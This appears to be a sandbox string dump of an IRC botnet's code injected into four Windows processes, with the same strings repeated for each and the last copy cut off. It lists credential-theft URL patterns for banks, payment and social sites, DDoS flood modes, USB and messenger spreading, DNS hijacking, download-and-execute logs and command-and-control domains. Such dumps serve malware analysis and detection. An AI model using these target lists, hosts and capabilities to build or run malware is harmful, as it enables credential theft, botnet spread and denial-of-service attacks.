mscorsvw.exe_284_rwx_008E0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%WinDir%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

jqs.exe_324_rwx_010C0000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
%Program Files%\Java\jre6\bin\jqs.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Program Files\Java\jre6\bin\jqs.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

winlogon.exe_716_rwx_01420000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0C
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\c1419a97
\??\%System%\winlogon.exe
%WinDir%
%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe
7 767<7~7
8*808;8~8
%s\Identities\%s.exe
\\.\pipe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\
winlogon.exe
notepad.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe

services.exe_760_rwx_00B00000_0004E000:

.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
m1xg.org
mxxtxxt.biz
meob.me
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
